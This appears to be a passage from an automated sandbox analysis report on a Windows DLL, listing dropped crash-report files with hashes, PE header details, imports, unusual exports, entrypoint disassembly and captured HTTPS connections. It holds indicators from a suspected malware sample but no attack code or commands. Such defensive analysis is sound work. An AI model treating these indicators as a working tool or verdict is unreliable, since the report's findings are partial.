SHA-512:	AF338840302787068FB203A2D7A35476D9F0E3778A60F666A12B0340D5A2C1B531D84072633F38E66A0051584445A75E25F5B754F269995D276040099330856E
Malicious:	false
Preview:	MDMP....... ....... "ea...................U...........B..............GenuineIntelW...........T............!ea"............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER641E.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Oct 12 05:50:27 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	33944
Entropy (8bit):	2.4971407466657674
Encrypted:	false
SSDEEP:	192:MqbUQaZobrmnWtMdHuIQLGSw7KJBJFC418LfVnuXi:WMbt2dHYLRw8LQw8RuXi
MD5:	ED1E5F7A96BD8C5678207BB626E3B182
SHA1:	5FF459096BE638E25946DA755E3B42C8BADEEE73
SHA-256:	CFF33D2F88999800F4CB2B160AE186D60D4AC94B582D92A6FF0EC16AD2429482
SHA-512:	F369CBEC9506EDFD281F8E40ED243325D553CF0118A6F880FF37E99B3F405B913A1DEE420ADDA1DB560851B62A319EFBED9CF980C6EE0F39C55C5EADEEE795F8
Malicious:	false
Preview:	MDMP....... .......#"ea...................U...........B..............GenuineIntelW...........T.......H....!ea"............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER78C0.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8410
Entropy (8bit):	3.6978573974817097
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiHn6nq96Y+k63gmf8dSPCprx89bNasfivm:RrlsNiH6q96Yd63gmf8dS5N5fz
MD5:	1DA794412F26C38602614685A8EE012A
SHA1:	D3809FC946708E94D4C26AA87AB3A0F63D8DA902
SHA-256:	5247CB378F8D8ED99506A57FE11CAC96B9A1852A2861162053B0B609B65FE16D
SHA-512:	78568E371F6E42A35E97581B03EF545C9C1CF2E2B227B51DCA0D76234224AD02939EE09D0D44C1C22432D764BB39585A1CC61E56FE68FBD1A31B767943BAE2EE
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.4.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D74.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4771
Entropy (8bit):	4.480321171931333
Encrypted:	false
SSDEEP:	48:cvIwSD8zspJgtWI90yWSC8Bs8fm8M4JCdsjMFXy+q8vjsjNc34SrS8ad:uITf7nTSN/JJ2yKONc3DW/d
MD5:	C33A482127B7209EF51325AC96C085D2
SHA1:	7E03254FA9071E6EB0A880248E3861CCF9725C06
SHA-256:	35F6DC0BD6946C69214D132B5212A5C3C22C3DC3576567042E006EADDC1009A7
SHA-512:	F244067052BA64DE48D46B2469932A6723D48B73B38E9B6F04DAFA6839F1ED5CC76764F1831CDAE62EF0EAF4C51ED329F6F5DE2DA2D204B3F0420FB624F9C1D1
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206181" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7EEA.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8410
Entropy (8bit):	3.698928902317836
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNinR6/o6Y+W63gmf8dSPCprp89bEssfpsm:RrlsNiR6/o6Yf63gmf8dSRE/f3
MD5:	4C0A64AF5A4E98C589035B3D6D31758A
SHA1:	6AAD8DFB5F4E8987147668F43141380038B7F327
SHA-256:	065C35A21B6A897FE8122FB194D355F5A121FD9D1D46E5CEC6F006BFB58CB374
SHA-512:	3BDFD7FBEE619CC1340B35531A458988664BE9B2A55F0ECEDACAA7313AD8A417831854DE5A6EC7C56B13840149C11189C7D8DE736955CBE759A0A60B75A9BC3B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.8.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER861F.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4771
Entropy (8bit):	4.481061523546041
Encrypted:	false
SSDEEP:	48:cvIwSD8zspJgtWI90yWSC8BN8fm8M4JCdsjMFpo+q8vjsjG4SrS5d:uITf7nTSNsJJ0oKOGDW5d
MD5:	664B4582229AD3ECE4BEBC614E508369
SHA1:	5238FF8643575C4C09BA5C30A1D8D61E5A15EBF2
SHA-256:	B0742289DDACB40DBF830E5308EC88FB4CEBFE03E4BDE54992708EDCB5D0750A
SHA-512:	155C2A3A298996007A5D9696F8FEE6AB3AFA77B70519348123B83D5AA869A5DCC4FF49715F7D27D8D9F041471278AAA6860AC156F5C5E7031D3CFA864735D195
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206181" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8830.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Oct 12 05:50:34 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	35442
Entropy (8bit):	2.388382779654516
Encrypted:	false
SSDEEP:	192:p1l+vWtMdHuIQLGSLLgL95JQGFW1l6c6nwpIAS:7l+e2dHYLRLQ97QKW1lg63S
MD5:	8E3A91DE6D34C6B37A18863FC52FD781
SHA1:	F4ABB52DC5D993F6B3C7FAC44FDBCB595A6E1945
SHA-256:	DBF4090005CFA672CDE2A08892B07517D70AE5BF79682A0C860BC3A403E14033
SHA-512:	69A66C9220261386403D262E8D396AC68EB59E9910CB9D8D170C1B5218AC2625B9EFFBE2C114B1C1E8858C8BA89902628A20005FF5D38C0CF9DB1EF2803CBB9E
Malicious:	false
Preview:	MDMP....... .......*"ea...................U...........B..............GenuineIntelW...........T............!ea!............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D40.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8406
Entropy (8bit):	3.6991459004086367
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi9M06e6Y+b63gmf8dSPCprc89bX9sfAdm:RrlsNiP6e6Yy63gmf8dSOX2fX
MD5:	EC2B0AB20C4D7D29A40FA0B7F2CEFB08
SHA1:	C3E1BE92C6AD26216F7716C7435AF8D02097BAE7
SHA-256:	179E9395CFD91EA03A0C11DC8F20B5D00C16A50BCEC678880E0003CCB42FD713
SHA-512:	4E14D4F39966D4DD4F54946F6B90079C674B3D3EE7588295B13E0CCD2FBD0C17E8FE7949BB245C0D63424074372B51F705237BB27333A4F88B3D31283881A389
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.0.5.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA35B.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4771
Entropy (8bit):	4.481644751827183
Encrypted:	false
SSDEEP:	48:cvIwSD8zspJgtWI90yWSC8BULs8fm8M4JCdsjMFxSV+q8vjsj74SrS6d:uITf7nTSNOLRJJGcKO7DW6d
MD5:	C31A63EB601F08250D9259422447EF2D
SHA1:	0A24CAF93C43688624BC5D8CE60C71C94A9728E9
SHA-256:	2CFB01390B883D688A8746DBE48DE7B3586C184BE46B61229C3C9A337E00E951
SHA-512:	0E970114A231C8D777D6C1AD7929AF8CDA8B5E3203483ABD5A51F74CFA5DA65C6E8DFB9B01E42814C76FA774EB96086D9E3E425B994726F93ED3591B8906977D
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206181" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.669873789159674
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	6yDD19jMIu.dll
File size:	718336
MD5:	903cf677ba834a968b42bd71e4626a9d
SHA1:	c751f3ab4612917d15967fc1f0591e674c2e56ca
SHA256:	b601a3c9c3a3df9043ea82733f1da5b413207d7585ca6b18baa8a4d923ce92d8
SHA512:	b81d6b419c05ac351d086ab9d439b7cf2d8db21208f85b13e483bacb800a811890ca7fc3ce2295d2861f3323b0d52725e27f42758ef4ec6312018b4a7a249095
SSDEEP:	12288:1UAQSx16fDEr8Np6b/rPPsjosrS9aEoe+0JCym+4YJAOSVUNcuHIGF4uW/XrGAsF:1z3x16fq8Np6bTPPaBreaZlYCOSVol2S
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................."w\|.............].......].......]......."wf.............].......].......]...............].......Rich...........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1003ab77
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5F6FF725 [Sun Sep 27 02:21:25 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	b5c6badd398e2e3aa283a40a40432c6c

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F0B1092C057h
call 00007F0B1092CB42h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F0B1092BEFAh
add esp, 0Ch
pop ebp
retn 000Ch
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007F0B1092BC53h
jmp 00007F0B1092C030h
mov ecx, dword ptr [ebp-14h]
xor ecx, ebp
call 00007F0B1092BC42h
jmp 00007F0B1092C01Fh
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [100AA0D4h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [100AA0D4h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
inc dword ptr fs:[eax]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xa8990	0x80	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa8a10	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x146000	0x53d0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa474c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa47a0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7b000	0x1fc	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x79f71	0x7a000	False	0.510071801358	data	6.75462598911	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7b000	0x2e586	0x2e600	False	0.556366871631	data	5.60177209336	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xaa000	0x9b19c	0x1800	False	0.190266927083	data	4.15778005426	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0x146000	0x53d0	0x5400	False	0.752650669643	data	6.72453697464	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	LockResource, FreeLibrary, GetProcAddress, VirtualProtect, OpenProcess, GetCurrentThreadId, Sleep, GetSystemTime, CreateSemaphoreW, LoadLibraryW, GetModuleFileNameW, GetModuleHandleW, GetTempPathW, CreateFileW, GetVolumeInformationW, QueryPerformanceCounter, GetVersionExW, GetDateFormatW, OutputDebugStringW, CloseHandle, ReadConsoleW, ReadFile, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, HeapSize, SetStdHandle, SetFilePointerEx, GetFileSizeEx, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetConsoleCtrlHandler, GetFileType, GetStdHandle, HeapReAlloc, HeapFree, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, WideCharToMultiByte, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, LoadLibraryExW, QueryPerformanceFrequency, ExitProcess, GetModuleHandleExW, GetCurrentThread, HeapAlloc, GetTimeZoneInformation, GetTimeFormatW, WriteConsoleW
USER32.dll	CreateMenu, DeferWindowPos, BeginDeferWindowPos, UnregisterHotKey, TranslateMessage, RegisterWindowMessageW, GetPropW
MSACM32.dll	acmDriverClose, acmFormatChooseW, acmFilterDetailsW, acmFilterEnumW, acmDriverEnum, acmDriverPriority, acmFormatEnumW, acmFilterTagEnumW, acmFormatTagDetailsW, acmDriverMessage, acmFormatSuggest, acmFilterTagDetailsW, acmFormatTagEnumW, acmFilterChooseW, acmDriverOpen, acmDriverDetailsW, acmFormatDetailsW, acmMetrics, acmDriverAddW, acmDriverRemove, acmDriverID, acmGetVersion

Exports

Name	Ordinal	Address
BeGrass	1	0x10016020
Fieldeight	2	0x100162f0
Often	3	0x10016510
Townenter	4	0x100167a0

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 11, 2021 22:50:22.477772951 CEST	49765	443	192.168.2.5	13.82.28.61
Oct 11, 2021 22:50:22.477812052 CEST	443	49765	13.82.28.61	192.168.2.5
Oct 11, 2021 22:50:22.479016066 CEST	49765	443	192.168.2.5	13.82.28.61
Oct 11, 2021 22:50:22.511131048 CEST	49765	443	192.168.2.5	13.82.28.61
Oct 11, 2021 22:50:22.511164904 CEST	443	49765	13.82.28.61	192.168.2.5
Oct 11, 2021 22:50:22.590322971 CEST	49766	443	192.168.2.5	13.82.28.61
Oct 11, 2021 22:50:22.590380907 CEST	443	49766	13.82.28.61	192.168.2.5
Oct 11, 2021 22:50:22.590491056 CEST	49766	443	192.168.2.5	13.82.28.61
Oct 11, 2021 22:50:22.599661112 CEST	49766	443	192.168.2.5	13.82.28.61
Oct 11, 2021 22:50:22.599700928 CEST	443	49766	13.82.28.61	192.168.2.5
Oct 11, 2021 22:50:22.830621004 CEST	443	49765	13.82.28.61	192.168.2.5
Oct 11, 2021 22:50:22.830780029 CEST	49765	443	192.168.2.5	13.82.28.61
Oct 11, 2021 22:50:22.843853951 CEST	49765	443	192.168.2.5	13.82.28.61
Oct 11, 2021 22:50:22.843878031 CEST	443	49765	13.82.28.61	192.168.2.5
Oct 11, 2021 22:50:22.844290972 CEST	443	49765	13.82.28.61	192.168.2.5
Oct 11, 2021 22:50:22.915033102 CEST	443	49766	13.82.28.61	192.168.2.5
Oct 11, 2021 22:50:22.915242910 CEST	49766	443	192.168.2.5	13.82.28.61
Oct 11, 2021 22:50:22.968174934 CEST	49765	443	192.168.2.5	13.82.28.61
Oct 11, 2021 22:50:23.075587034 CEST	49766	443	192.168.2.5	13.82.28.61
Oct 11, 2021 22:50:23.075615883 CEST	443	49766	13.82.28.61	192.168.2.5
Oct 11, 2021 22:50:23.075884104 CEST	443	49766	13.82.28.61	192.168.2.5
Oct 11, 2021 22:50:23.171344995 CEST	49766	443	192.168.2.5	13.82.28.61
Oct 11, 2021 22:50:23.709528923 CEST	49765	443	192.168.2.5	13.82.28.61
Oct 11, 2021 22:50:23.755141020 CEST	443	49765	13.82.28.61	192.168.2.5
Oct 11, 2021 22:50:23.823232889 CEST	443	49765	13.82.28.61	192.168.2.5
Oct 11, 2021 22:50:23.825589895 CEST	443	49765	13.82.28.61	192.168.2.5
Oct 11, 2021 22:50:23.830543995 CEST	49765	443	192.168.2.5	13.82.28.61
Oct 11, 2021 22:50:23.839725018 CEST	49765	443	192.168.2.5	13.82.28.61
Oct 11, 2021 22:50:23.839776993 CEST	443	49765	13.82.28.61	192.168.2.5
Oct 11, 2021 22:50:23.839807034 CEST	49765	443	192.168.2.5	13.82.28.61
Oct 11, 2021 22:50:23.839818001 CEST	443	49765	13.82.28.61	192.168.2.5
Oct 11, 2021 22:50:23.898751020 CEST	49766	443	192.168.2.5	13.82.28.61
Oct 11, 2021 22:50:23.939150095 CEST	443	49766	13.82.28.61	192.168.2.5
Oct 11, 2021 22:50:24.014254093 CEST	443	49766	13.82.28.61	192.168.2.5
Oct 11, 2021 22:50:24.014353991 CEST	443	49766	13.82.28.61	192.168.2.5
Oct 11, 2021 22:50:24.014559031 CEST	49766	443	192.168.2.5	13.82.28.61
Oct 11, 2021 22:50:24.430315018 CEST	49766	443	192.168.2.5	13.82.28.61
Oct 11, 2021 22:50:24.430345058 CEST	443	49766	13.82.28.61	192.168.2.5
Oct 11, 2021 22:50:24.430403948 CEST	49766	443	192.168.2.5	13.82.28.61
Oct 11, 2021 22:50:24.430413008 CEST	443	49766	13.82.28.61	192.168.2.5
Oct 11, 2021 22:51:06.365499020 CEST	49785	443	192.168.2.5	40.97.161.50
Oct 11, 2021 22:51:06.365540028 CEST	443	49785	40.97.161.50	192.168.2.5
Oct 11, 2021 22:51:06.365628958 CEST	49785	443	192.168.2.5	40.97.161.50
Oct 11, 2021 22:51:06.366198063 CEST	49785	443	192.168.2.5	40.97.161.50
Oct 11, 2021 22:51:06.366214037 CEST	443	49785	40.97.161.50	192.168.2.5
Oct 11, 2021 22:51:06.877902031 CEST	443	49785	40.97.161.50	192.168.2.5
Oct 11, 2021 22:51:06.890742064 CEST	49785	443	192.168.2.5	40.97.161.50
Oct 11, 2021 22:51:06.896148920 CEST	49785	443	192.168.2.5	40.97.161.50
Oct 11, 2021 22:51:06.896168947 CEST	443	49785	40.97.161.50	192.168.2.5
Oct 11, 2021 22:51:06.896533966 CEST	443	49785	40.97.161.50	192.168.2.5
Oct 11, 2021 22:51:06.899832964 CEST	49785	443	192.168.2.5	40.97.161.50
Oct 11, 2021 22:51:06.943133116 CEST	443	49785	40.97.161.50	192.168.2.5
